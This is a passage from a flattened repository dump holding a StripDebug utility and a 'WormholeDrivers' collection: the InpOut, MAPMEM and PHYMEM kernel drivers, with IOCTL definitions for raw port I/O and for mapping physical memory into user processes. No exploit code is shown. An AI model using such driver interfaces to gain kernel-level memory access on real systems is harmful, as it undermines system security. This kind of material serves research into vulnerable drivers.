Debug|x64 16 | {177E3B73-F1F9-4C70-AFFF-9474DECEDAD1}.Release|x64.ActiveCfg = Release|x64 17 | {177E3B73-F1F9-4C70-AFFF-9474DECEDAD1}.Release|x64.Build.0 = Release|x64 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | EndGlobal 23 | -------------------------------------------------------------------------------- /source/StripDebug/StripDebug.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | {a2258c3e-0c10-4091-bb15-4cfbc255d0c5} 18 | 19 | 20 | 21 | 22 | Source Files 23 | 24 | 25 | Source Files 26 | 27 | 28 | minirtl 29 | 30 | 31 | minirtl 32 | 33 | 34 | minirtl 35 | 36 | 37 | minirtl 38 | 39 | 40 | 41 | 42 | Header Files 43 | 44 | 45 | Header Files 46 | 47 | 48 | Header Files 49 | 50 | 51 | minirtl 52 | 53 | 54 | Header Files 55 | 56 | 57 | -------------------------------------------------------------------------------- /source/StripDebug/StripDebug.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | C:\MAKEEXE\StripDebug\StripDebug\test.exe 5 | WindowsLocalDebugger 6 | 7 | 8 | C:\MAKEEXE\StripDebug\StripDebug\test.exe 9 | WindowsLocalDebugger 10 | 11 | -------------------------------------------------------------------------------- /source/StripDebug/cui.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************* 2 | * 3 | * (C) COPYRIGHT AUTHORS, 2016 - 2018 4 | * 5 | * TITLE: CUI.H 6 | * 7 | * VERSION: 1.30 8 | * 9 | * DATE: 
01 Aug 2018 10 | * 11 | * Common header file for console ui. 12 | * 13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF 14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED 15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A 16 | * PARTICULAR PURPOSE. 17 | * 18 | *******************************************************************************/ 19 | #pragma once 20 | 21 | VOID cuiInitialize( 22 | _In_ BOOL InitInput, 23 | _Out_opt_ PBOOL IsConsoleOutput 24 | ); 25 | 26 | #ifdef _UNICODE 27 | #define cuiPrintText cuiPrintTextW 28 | #define cuiPrintTextLastError cuiPrintTextLastErrorW 29 | #else 30 | #define cuiPrintText cuiPrintTextA 31 | #define cuiPrintTextLastError cuiPrintTextLastErrorA 32 | #endif 33 | 34 | 35 | VOID cuiPrintTextA( 36 | _In_ LPSTR lpText, 37 | _In_ BOOL UseReturn 38 | ); 39 | 40 | VOID cuiPrintTextW( 41 | _In_ LPWSTR lpText, 42 | _In_ BOOL UseReturn 43 | ); 44 | 45 | VOID cuiPrintTextLastErrorA( 46 | _In_ BOOL UseReturn 47 | ); 48 | 49 | VOID cuiPrintTextLastErrorW( 50 | _In_ BOOL UseReturn 51 | ); 52 | 53 | VOID cuiClrScr( 54 | VOID 55 | ); 56 | -------------------------------------------------------------------------------- /source/StripDebug/global.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | //disable nonmeaningful warnings. 
4 | #pragma warning(disable: 4091) //'typedef ': ignored on left of '' when no variable is declared 5 | #pragma warning(disable: 4005) // macro redefinition 6 | #pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union 7 | #pragma warning(disable: 4054) // %s : from function pointer %s to data pointer %s 8 | #pragma warning(disable: 6102) // Using %s from failed function call at line %u 9 | 10 | #include 11 | #include 12 | #include "cui.h" 13 | #include "minirtl\minirtl.h" 14 | #include "minirtl\cmdline.h" 15 | 16 | #pragma comment(lib, "dbghelp.lib") 17 | #pragma comment(lib, "imagehlp.lib") 18 | 19 | #if !defined UNICODE 20 | #error ANSI build is not supported 21 | #endif 22 | 23 | #if defined (_MSC_VER) 24 | #if (_MSC_VER >= 1910) 25 | #ifdef _DEBUG 26 | #pragma comment(lib, "vcruntimed.lib") 27 | #pragma comment(lib, "ucrtd.lib") 28 | #else 29 | #pragma comment(lib, "libucrt.lib") 30 | #pragma comment(lib, "libvcruntime.lib") 31 | #endif 32 | #endif 33 | #endif 34 | 35 | #define IMAGE_DEBUG_TYPE_POGO 13 36 | 37 | PIMAGE_NT_HEADERS WINAPI CheckSumMappedFile( 38 | _In_ PVOID BaseAddress, 39 | _In_ DWORD FileLength, 40 | _Out_ PDWORD HeaderSum, 41 | _Out_ PDWORD CheckSum 42 | ); 43 | 44 | -------------------------------------------------------------------------------- /source/StripDebug/minirtl/_strcat.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | char *_strcat_a(char *dest, const char *src) 4 | { 5 | if ( (dest==0) || (src==0) ) 6 | return dest; 7 | 8 | while ( *dest!=0 ) 9 | dest++; 10 | 11 | while ( *src!=0 ) { 12 | *dest = *src; 13 | dest++; 14 | src++; 15 | } 16 | 17 | *dest = 0; 18 | return dest; 19 | } 20 | 21 | wchar_t *_strcat_w(wchar_t *dest, const wchar_t *src) 22 | { 23 | if ( (dest==0) || (src==0) ) 24 | return dest; 25 | 26 | while ( *dest!=0 ) 27 | dest++; 28 | 29 | while ( *src!=0 ) { 30 | *dest = *src; 31 | dest++; 32 | src++; 33 | } 34 | 35 | *dest 
= 0; 36 | return dest; 37 | } 38 | -------------------------------------------------------------------------------- /source/StripDebug/minirtl/_strcpy.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | char *_strcpy_a(char *dest, const char *src) 4 | { 5 | char *p; 6 | 7 | if ( (dest==0) || (src==0) ) 8 | return dest; 9 | 10 | if (dest == src) 11 | return dest; 12 | 13 | p = dest; 14 | while ( *src!=0 ) { 15 | *p = *src; 16 | p++; 17 | src++; 18 | } 19 | 20 | *p = 0; 21 | return dest; 22 | } 23 | 24 | wchar_t *_strcpy_w(wchar_t *dest, const wchar_t *src) 25 | { 26 | wchar_t *p; 27 | 28 | if ((dest == 0) || (src == 0)) 29 | return dest; 30 | 31 | if (dest == src) 32 | return dest; 33 | 34 | p = dest; 35 | while ( *src!=0 ) { 36 | *p = *src; 37 | p++; 38 | src++; 39 | } 40 | 41 | *p = 0; 42 | return dest; 43 | } 44 | -------------------------------------------------------------------------------- /source/StripDebug/minirtl/_strlen.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | size_t _strlen_a(const char *s) 4 | { 5 | char *s0 = (char *)s; 6 | 7 | if ( s==0 ) 8 | return 0; 9 | 10 | while ( *s!=0 ) 11 | s++; 12 | 13 | return (s-s0); 14 | } 15 | 16 | size_t _strlen_w(const wchar_t *s) 17 | { 18 | wchar_t *s0 = (wchar_t *)s; 19 | 20 | if ( s==0 ) 21 | return 0; 22 | 23 | while ( *s!=0 ) 24 | s++; 25 | 26 | return (s-s0); 27 | } 28 | -------------------------------------------------------------------------------- /source/StripDebug/minirtl/cmdline.h: -------------------------------------------------------------------------------- 1 | #ifndef _CMDLINEH_ 2 | #define _CMDLINEH_ 3 | 4 | BOOL GetCommandLineParamW( 5 | IN LPCWSTR CmdLine, 6 | IN ULONG ParamIndex, 7 | OUT LPWSTR Buffer, 8 | IN ULONG BufferSize, 9 | OUT PULONG ParamLen 10 | ); 11 | 12 | BOOL GetCommandLineParamA( 13 | IN LPCSTR CmdLine, 14 | IN ULONG ParamIndex, 15 | OUT LPSTR 
Buffer, 16 | IN ULONG BufferSize, 17 | OUT PULONG ParamLen 18 | ); 19 | 20 | char *ExtractFilePathA(const char *FileName, char *FilePath); 21 | wchar_t *ExtractFilePathW(const wchar_t *FileName, wchar_t *FilePath); 22 | 23 | #ifdef UNICODE 24 | 25 | #define ExtractFilePath ExtractFilePathW 26 | #define GetCommandLineParam GetCommandLineParamW 27 | 28 | #else // ANSI 29 | 30 | #define ExtractFilePath ExtractFilePathA 31 | #define GetCommandLineParam GetCommandLineParamA 32 | 33 | #endif 34 | 35 | #endif /* _CMDLINEH_ */ 36 | -------------------------------------------------------------------------------- /source/StripDebug/minirtl/rtltypes.h: -------------------------------------------------------------------------------- 1 | #ifndef _WCHAR_T_DEFINED 2 | typedef unsigned short wchar_t; 3 | #define _WCHAR_T_DEFINED 4 | #endif /* _WCHAR_T_DEFINED */ 5 | 6 | #ifndef _SIZE_T_DEFINED 7 | #ifdef _WIN64 8 | typedef unsigned __int64 size_t; 9 | #else /* _WIN64 */ 10 | typedef __w64 unsigned int size_t; 11 | #endif /* _WIN64 */ 12 | #define _SIZE_T_DEFINED 13 | #endif /* _SIZE_T_DEFINED */ 14 | 15 | __forceinline char locase_a(char c) 16 | { 17 | if ((c >= 'A') && (c <= 'Z')) 18 | return c + 0x20; 19 | else 20 | return c; 21 | } 22 | 23 | __forceinline wchar_t locase_w(wchar_t c) 24 | { 25 | if ((c >= 'A') && (c <= 'Z')) 26 | return c + 0x20; 27 | else 28 | return c; 29 | } 30 | 31 | __forceinline char byteabs(char x) { 32 | if (x < 0) 33 | return -x; 34 | return x; 35 | } 36 | 37 | __forceinline int _isdigit_a(char x) { 38 | return ((x >= '0') && (x <= '9')); 39 | } 40 | 41 | __forceinline int _isdigit_w(wchar_t x) { 42 | return ((x >= L'0') && (x <= L'9')); 43 | } 44 | -------------------------------------------------------------------------------- /source/WormholeDrivers/INPOUT/HWInterfaceDrv.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 9.00 3 | # Visual Studio 2005 4 | 
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HWInterfaceDrv", "HWInterfaceDrv.vcproj", "{95B297EE-9E8E-464B-B626-A69C9ED13158}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|Win32 = Debug|Win32 9 | Release|Win32 = Release|Win32 10 | EndGlobalSection 11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 12 | {95B297EE-9E8E-464B-B626-A69C9ED13158}.Debug|Win32.ActiveCfg = Debug|Win32 13 | {95B297EE-9E8E-464B-B626-A69C9ED13158}.Debug|Win32.Build.0 = Debug|Win32 14 | {95B297EE-9E8E-464B-B626-A69C9ED13158}.Release|Win32.ActiveCfg = Release|Win32 15 | {95B297EE-9E8E-464B-B626-A69C9ED13158}.Release|Win32.Build.0 = Release|Win32 16 | EndGlobalSection 17 | GlobalSection(SolutionProperties) = preSolution 18 | HideSolutionNode = FALSE 19 | EndGlobalSection 20 | EndGlobal 21 | -------------------------------------------------------------------------------- /source/WormholeDrivers/INPOUT/HWInterfaceDrv.vcproj: -------------------------------------------------------------------------------- 1 | 2 | 10 | 11 | 14 | 15 | 16 | 17 | 18 | 24 | 37 | 38 | 44 | 57 | 58 | 59 | 60 | 61 | 62 | 67 | 70 | 71 | 72 | 77 | 80 | 81 | 82 | 87 | 90 | 91 | 92 | 95 | 96 | 99 | 100 | 103 | 104 | 105 | 106 | 107 | 108 | -------------------------------------------------------------------------------- /source/WormholeDrivers/INPOUT/MAKEFILE: -------------------------------------------------------------------------------- 1 | # 2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source 3 | # file to this component. 
This file merely indirects to the real make file 4 | # that is shared by all the driver components of the Windows NT DDK 5 | # 6 | 7 | !INCLUDE $(NTMAKEENV)\makefile.def 8 | -------------------------------------------------------------------------------- /source/WormholeDrivers/INPOUT/ReadMe.txt: -------------------------------------------------------------------------------- 1 | InpOut32Drv Driver Interface DLL 2 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 3 | 4 | Modified for x64 compatibility and built by Phillip Gibbons (Phil@highrez.co.uk). 5 | See http://www.highrez.co.uk/Downloads/InpOut32 or the Highrez Forums (http://forums.highrez.co.uk) for information. 6 | Many thanks to Red Fox UK for supporting the community and providing Driver signatures allowing Vista/7 x64 compatibility. 7 | 8 | 9 | 10 | Based on the original written by Logix4U (www.logix4u.net). 11 | 12 | 13 | Notes: 14 | 15 | The InpOut32 device driver supports writing to "old fashioned" hardware port addresses. 16 | It does NOT support USB devices such as USB Parallel ports or even PCI parallel ports (as I am led to believe). 17 | 18 | 19 | The device driver is installed at runtime. Doing this, however, needs administrator privileges. 20 | On Vista & later, using UAC, you can run the InstallDriver.exe in the \Win32 folder to install the driver 21 | appropriate for your OS. Doing so will request elevation and ask for your permission (or for the administrator 22 | password). Once the driver is installed for the first time, it can then be used by any user *without* 23 | administrator privileges. 24 | 25 | -------------------------------------------------------------------------------- /source/WormholeDrivers/INPOUT/SOURCES: -------------------------------------------------------------------------------- 1 | # 2 | # setup visualC++ source browsing 3 | # 4 | BSCMAKE_FLAGS=$(BSCMAKE_FLAGS) -n 5 | 6 | 7 | 8 | !if $(AMD64) 9 | ! 
message BUILDMSG: Info : Building amd64 Inpoutx64.sys 10 | TARGETNAME=inpoutx64 11 | !else 12 | !message BUILDMSG: Info : Building i386 Inpout32.sys 13 | TARGETNAME=inpout32 14 | !endif 15 | 16 | _NT_TARGET_VERSION = 0x0500 17 | TARGETPATH=obj 18 | TARGETTYPE=DRIVER 19 | INCLUDES=..\ 20 | 21 | SOURCES=hwinterfacedrv.c hwinterfacedrv.rc 22 | -------------------------------------------------------------------------------- /source/WormholeDrivers/INPOUT/hwinterfacedrv.h: -------------------------------------------------------------------------------- 1 | 2 | /* Control codes for the port I/O requests. Each literal is the signed 32-bit decimal form of the CTL_CODE value given in its trailing comment; for example CTL_CODE(40000, 0x801, METHOD_BUFFERED, FILE_ANY_ACCESS) is 0x9C402004, which reads as -1673519100. FILE_ANY_ACCESS means the control code itself asks for no read or write access on the device handle, so restricting callers depends on how the driver creates and secures its device object (not visible in this header). */ #define IOCTL_READ_PORT_UCHAR -1673519100 //CTL_CODE(40000, 0x801, METHOD_BUFFERED, FILE_ANY_ACCESS) 3 | #define IOCTL_WRITE_PORT_UCHAR -1673519096 //CTL_CODE(40000, 0x802, METHOD_BUFFERED, FILE_ANY_ACCESS) 4 | #define IOCTL_READ_PORT_USHORT -1673519092 //CTL_CODE(40000, 0x803, METHOD_BUFFERED, FILE_ANY_ACCESS) 5 | #define IOCTL_WRITE_PORT_USHORT -1673519088 //CTL_CODE(40000, 0x804, METHOD_BUFFERED, FILE_ANY_ACCESS) 6 | #define IOCTL_READ_PORT_ULONG -1673519084 //CTL_CODE(40000, 0x805, METHOD_BUFFERED, FILE_ANY_ACCESS) 7 | #define IOCTL_WRITE_PORT_ULONG -1673519080 //CTL_CODE(40000, 0x806, METHOD_BUFFERED, FILE_ANY_ACCESS) 8 | 9 | /* Physical memory map and unmap requests. No CTL_CODE comment is given for these two; decoding the literals the same way yields device type 40000 with functions 0x807 and 0x808, METHOD_BUFFERED, FILE_ANY_ACCESS. */ #define IOCTL_WINIO_MAPPHYSTOLIN -1673519076 10 | #define IOCTL_WINIO_UNMAPPHYSADDR -1673519072 11 | 12 | #pragma pack(push) 13 | #pragma pack(1) 14 | 15 | /* Byte-packed (pack(1)) record declared next to the map and unmap codes; presumably the request buffer for them - confirm against hwinterfacedrv.c. Field roles are not stated in this header and are only suggested by the names. */ struct tagPhys32Struct 16 | { 17 | HANDLE PhysicalMemoryHandle; 18 | SIZE_T dwPhysMemSizeInBytes; 19 | PVOID pvPhysAddress; 20 | PVOID pvPhysMemLin; 21 | }; 22 | 23 | extern struct tagPhys32Struct Phys32Struct; 24 | 25 | #pragma pack(pop) -------------------------------------------------------------------------------- /source/WormholeDrivers/INPOUT/hwinterfacedrv.rc: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | #define VER_FILETYPE VFT_DRV 5 | #define VER_FILESUBTYPE VFT2_DRV_SYSTEM 6 | #ifdef _AMD64_ 7 | #define VER_INTERNALNAME_STR "inpoutx64.sys" 8 | #define 
VER_ORIGINALFILENAME_STR "inpoutx64.sys" 9 | #define VER_PRODUCTNAME_STR "inpoutx64 Driver Version 1.2" 10 | #define VER_PRODUCTVERSION_STR "1.2 x64" 11 | #else 12 | #define VER_INTERNALNAME_STR "inpout32.sys" 13 | #define VER_ORIGINALFILENAME_STR "inpout32.sys" 14 | #define VER_PRODUCTNAME_STR "inpout32 Driver Version 1.2" 15 | #define VER_PRODUCTVERSION_STR "1.2" 16 | #endif 17 | #define VER_FILEDESCRIPTION_STR "Kernel level port access driver" 18 | #define VER_COMPANYNAME_STR "Highresolution Enterprises [www.highrez.co.uk]" 19 | #define VER_LEGALCOPYRIGHT_STR "Copyright (c) 2008 Highresolution Enterprises. Portions Copyright (c) Logix4u" 20 | #define VER_PRODUCTVERSION 1,2,00,000 21 | 22 | #include "common.ver" 23 | -------------------------------------------------------------------------------- /source/WormholeDrivers/INPOUT/license.txt: -------------------------------------------------------------------------------- 1 | Copyright (c) <2003-2015> Phil Gibbons 2 | Portions Copyright (c) <2000> 3 | 4 | Permission is hereby granted, free of charge, to any person obtaining a copy 5 | of this software and associated documentation files (the "Software"), to deal 6 | in the Software without restriction, including without limitation the rights 7 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 8 | copies of the Software, and to permit persons to whom the Software is 9 | furnished to do so, subject to the following conditions: 10 | 11 | 12 | 13 | The above copyright notice and this permission notice shall be included in 14 | all copies or substantial portions of the Software. 15 | 16 | 17 | 18 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 19 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 20 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE 21 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 22 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 23 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN 24 | THE SOFTWARE. -------------------------------------------------------------------------------- /source/WormholeDrivers/MAPMEM/DIRS: -------------------------------------------------------------------------------- 1 | DIRS=exe \ 2 | sys 3 | -------------------------------------------------------------------------------- /source/WormholeDrivers/MAPMEM/EXE/MAKEFILE: -------------------------------------------------------------------------------- 1 | # 2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source 3 | # file to this component. This file merely indirects to the real make file 4 | # that is shared by all the driver components of the Windows NT DDK 5 | # 6 | 7 | !INCLUDE $(NTMAKEENV)\makefile.def 8 | -------------------------------------------------------------------------------- /source/WormholeDrivers/MAPMEM/EXE/MAPTEST.MAK: -------------------------------------------------------------------------------- 1 | # Nmake macros for building Windows 32-Bit apps 2 | 3 | !include 4 | 5 | all: maptest.exe 6 | 7 | maptest.obj: maptest.c 8 | $(cc) $(cflags) $(cvars) $(cdebug) -I..\sys maptest.c 9 | 10 | maptest.exe: maptest.obj 11 | $(link) $(linkdebug) $(conflags) -out:maptest.exe maptest.obj $(conlibs) 12 | -------------------------------------------------------------------------------- /source/WormholeDrivers/MAPMEM/EXE/SOURCES: -------------------------------------------------------------------------------- 1 | 2 | TARGETNAME=maptest 3 | TARGETPATH=$(BASEDIR)\lib 4 | TARGETTYPE=PROGRAM 5 | 6 | INCLUDES=..\sys;$(BASEDIR)\src\video\inc 7 | 8 | SOURCES=maptest.c 9 | 10 | UMTYPE=console 11 | UMBASE=0x100000 12 | 
-------------------------------------------------------------------------------- /source/WormholeDrivers/MAPMEM/README.TXT: -------------------------------------------------------------------------------- 1 | Build & Run Instructions: 2 | ------------------------- 3 | 4 | The MAPMEM sample demonstrates how a kernel-mode device driver 5 | can utilize the Zw*MapViewOfSection APIs to (un)map a physical 6 | address into a user-mode process's address space. 7 | 8 | 9 | NOTE: Microsoft does not recommend architecting Win32 applications 10 | such that they read/write directly on physical memory. 11 | User-mode applications are not considered "trusted" parts 12 | of the system, and giving hardware access to untrusted 13 | modules seriously impairs system security. 14 | 15 | We encourage developers who need hardware access to locate 16 | their hardware I/O code in a device driver, and have their 17 | Win32 app communicate its requests to the driver via the 18 | DeviceIoControl() API. 19 | 20 | 21 | This sample is composed of two parts, a Windows NT kernel-mode 22 | device driver (MAPMEM) and a Win32 test application (MAPTEST). 23 | 24 | 25 | The Win32 portion contains a file, MAPTEST.C, which attempts to 26 | obtain a handle to MAPMEM & send it IOCTLs. The executable is built 27 | using the Windows NT SDK. First update the environment and path by 28 | running \setenv.bat. Then change to the directory where 29 | you have the C source code and the makefile. Type "nmake /f maptest.mak" 30 | to compile the Win32 program, MAPTEST.EXE. 31 | 32 | 33 | The kernel driver portion contains the driver source code, MAPMEM.C 34 | and a text file used to configure your registry so that the driver 35 | can be loaded. The driver is built using the Windows NT DDK. 36 | 37 | To build the driver: 38 | 39 | 40 | 1. 
Assuming you have run \setenv.bat and 41 | \setenv.bat, build the driver by typing: 42 | 43 | build -cef 44 | 45 | (If there are any errors have a look at the build.log, build.err, 46 | and build.wrn files to get an idea of what went wrong.) 47 | 48 | 49 | 2. Copy the newly built driver, \lib\*\MAPMEM.SYS to the 50 | \system32\drivers\ directory, i.e.: 51 | 52 | copy \ntddk\lib\i386\free\mapmem.sys c:\winnt\system32\drivers\ 53 | 54 | 55 | 3. Update the registry by running regini.exe on the mapmem.ini 56 | file, i.e.: 57 | 58 | regini mapmem.ini 59 | 60 | This adds a MAPMEM driver key under the HKEY_LOCAL_MACHINE\ 61 | SYSTEM\CurrentControlSet\Services tree in the registry. You 62 | can verify this by starting REGEDIT.EXE and looking in the 63 | appropriate place. 64 | 65 | 66 | 4. Reboot. 67 | 68 | 69 | 5. Type: 70 | 71 | net start mapmem 72 | 73 | ...and then execute MAPTEST.EXE. 74 | -------------------------------------------------------------------------------- /source/WormholeDrivers/MAPMEM/SYS/MAKEFILE: -------------------------------------------------------------------------------- 1 | # 2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source 3 | # file to this component. This file merely indirects to the real make file 4 | # that is shared by all the driver components of the Windows NT DDK 5 | # 6 | 7 | !INCLUDE $(NTMAKEENV)\makefile.def 8 | -------------------------------------------------------------------------------- /source/WormholeDrivers/MAPMEM/SYS/MAPMEM.H: -------------------------------------------------------------------------------- 1 | /*++ 2 | 3 | Copyright (c) 1993 Microsoft Corporation 4 | 5 | Module Name: 6 | 7 | mapmem.h 8 | 9 | Abstract: 10 | 11 | 12 | Environment: 13 | 14 | kernel & User mode 15 | 16 | Notes: 17 | 18 | 19 | Revision History: 20 | 21 | --*/ 22 | 23 | 24 | // 25 | // Define the various device type values. 
Note that values used by Microsoft 26 | // Corporation are in the range 0-32767, and 32768-65535 are reserved for use 27 | // by customers. 28 | // 29 | 30 | #define FILE_DEVICE_MAPMEM 0x00008000 31 | 32 | 33 | 34 | // 35 | // Macro definition for defining IOCTL and FSCTL function control codes. Note 36 | // that function codes 0-2047 are reserved for Microsoft Corporation, and 37 | // 2048-4095 are reserved for customers. 38 | // 39 | 40 | #define MAPMEM_IOCTL_INDEX 0x800 41 | 42 | 43 | // 44 | // Define our own private IOCTL 45 | // 46 | 47 | #define IOCTL_MAPMEM_MAP_USER_PHYSICAL_MEMORY CTL_CODE(FILE_DEVICE_MAPMEM , \ 48 | MAPMEM_IOCTL_INDEX, \ 49 | METHOD_BUFFERED, \ 50 | FILE_ANY_ACCESS) 51 | 52 | #define IOCTL_MAPMEM_UNMAP_USER_PHYSICAL_MEMORY CTL_CODE(FILE_DEVICE_MAPMEM, \ 53 | MAPMEM_IOCTL_INDEX+1,\ 54 | METHOD_BUFFERED, \ 55 | FILE_ANY_ACCESS) 56 | 57 | 58 | 59 | 60 | // 61 | // Our user mode app will pass an initialized structure like this 62 | // down to the kernel mode driver 63 | // 64 | 65 | typedef struct 66 | { 67 | INTERFACE_TYPE InterfaceType; // Isa, Eisa, etc.... 
68 | ULONG BusNumber; // Bus number 69 | PHYSICAL_ADDRESS BusAddress; // Bus-relative address 70 | ULONG AddressSpace; // 0 is memory, 1 is I/O 71 | ULONG Length; // Length of section to map 72 | 73 | } PHYSICAL_MEMORY_INFO, *PPHYSICAL_MEMORY_INFO; 74 | -------------------------------------------------------------------------------- /source/WormholeDrivers/MAPMEM/SYS/MAPMEM.INI: -------------------------------------------------------------------------------- 1 | \registry\machine\system\currentcontrolset\services\MapMem 2 | Type = REG_DWORD 0x00000001 3 | Start = REG_DWORD 0x00000003 4 | Group = Extended base 5 | ErrorControl = REG_DWORD 0x00000001 6 | -------------------------------------------------------------------------------- /source/WormholeDrivers/MAPMEM/SYS/SOURCES: -------------------------------------------------------------------------------- 1 | TARGETNAME=mapmem 2 | TARGETPATH=$(BASEDIR)\lib 3 | TARGETTYPE=DRIVER 4 | 5 | SOURCES=mapmem.c 6 | -------------------------------------------------------------------------------- /source/WormholeDrivers/PHYMEM/LICENSE: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/WormholeDrivers/PHYMEM/LICENSE -------------------------------------------------------------------------------- /source/WormholeDrivers/PHYMEM/LICENSE.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/WormholeDrivers/PHYMEM/LICENSE.html -------------------------------------------------------------------------------- /source/WormholeDrivers/PHYMEM/PCIFlt/DebugPrint.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/WormholeDrivers/PHYMEM/PCIFlt/DebugPrint.c 
-------------------------------------------------------------------------------- /source/WormholeDrivers/PHYMEM/PCIFlt/DebugPrint.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/WormholeDrivers/PHYMEM/PCIFlt/DebugPrint.h -------------------------------------------------------------------------------- /source/WormholeDrivers/PHYMEM/PCIFlt/PCIFilter.h: -------------------------------------------------------------------------------- 1 | #ifndef __PCIFILTER_H 2 | #define __PCIFILTER_H 3 | 4 | typedef enum tagDEVICE_PNP_STATE 5 | { 6 | NotStarted=0, // Not started yet 7 | Started, // Device has received the START_DEVICE IRP 8 | StopPending, // Device has received the QUERY_STOP IRP 9 | Stopped, // Device has received the STOP_DEVICE IRP 10 | RemovePending, // Device has received the QUERY_REMOVE IRP 11 | SurpriseRemovePending, // Device has received the SURPRISE_REMOVE IRP 12 | Deleted // Device has received the REMOVE_DEVICE IRP 13 | } DEVICE_PNP_STATE; 14 | 15 | #define INITIALIZE_PNP_STATE(_Data_) \ 16 | (_Data_)->DevicePnPState=NotStarted;\ 17 | (_Data_)->PreviousPnPState=NotStarted; 18 | 19 | #define SET_NEW_PNP_STATE(_Data_, _state_) \ 20 | (_Data_)->PreviousPnPState=(_Data_)->DevicePnPState; \ 21 | (_Data_)->DevicePnPState=(_state_); 22 | 23 | #define RESTORE_PREVIOUS_PNP_STATE(_Data_) \ 24 | (_Data_)->DevicePnPState=(_Data_)->PreviousPnPState; 25 | 26 | typedef struct tagDEVICE_EXTENSION 27 | { 28 | //physical device object 29 | PDEVICE_OBJECT pdo; 30 | 31 | //the device object we attached to 32 | PDEVICE_OBJECT lowerdo; 33 | 34 | //current pnp state 35 | DEVICE_PNP_STATE DevicePnPState; 36 | 37 | //previous pnp state 38 | DEVICE_PNP_STATE PreviousPnPState; 39 | 40 | //Remove Lock 41 | IO_REMOVE_LOCK rmLock; 42 | 43 | } DEVICE_EXTENSION, *PDEVICE_EXTENSION; 44 | 45 | #endif //__PCIFILTERZ_H 
-------------------------------------------------------------------------------- /source/WormholeDrivers/PHYMEM/PCIFlt/PCIFlt.dsw: -------------------------------------------------------------------------------- 1 | Microsoft Developer Studio Workspace File, Format Version 6.00 2 | # WARNING: DO NOT EDIT OR DELETE THIS WORKSPACE FILE! 3 | 4 | ############################################################################### 5 | 6 | Project: "PCIFlt"=.\PCIFlt.dsp - Package Owner=<4> 7 | 8 | Package=<5> 9 | {{{ 10 | }}} 11 | 12 | Package=<4> 13 | {{{ 14 | }}} 15 | 16 | ############################################################################### 17 | 18 | Global: 19 | 20 | Package=<5> 21 | {{{ 22 | }}} 23 | 24 | Package=<3> 25 | {{{ 26 | }}} 27 | 28 | ############################################################################### 29 | 30 | -------------------------------------------------------------------------------- /source/WormholeDrivers/PHYMEM/PCIFlt/Release/PCIFilter.inf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/WormholeDrivers/PHYMEM/PCIFlt/Release/PCIFilter.inf -------------------------------------------------------------------------------- /source/WormholeDrivers/PHYMEM/PCIFlt/Release/PCIFlt.sys: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/WormholeDrivers/PHYMEM/PCIFlt/Release/PCIFlt.sys -------------------------------------------------------------------------------- /source/WormholeDrivers/PHYMEM/PhyMem/driver/AccessBus.c: -------------------------------------------------------------------------------- 1 | /*++ 2 | access pci bus configuration 3 | --*/ 4 | 5 | #include 6 | #include 7 | #include "DebugPrint.h" 8 | 9 | //gets the bus interface standard information from the PDO. 
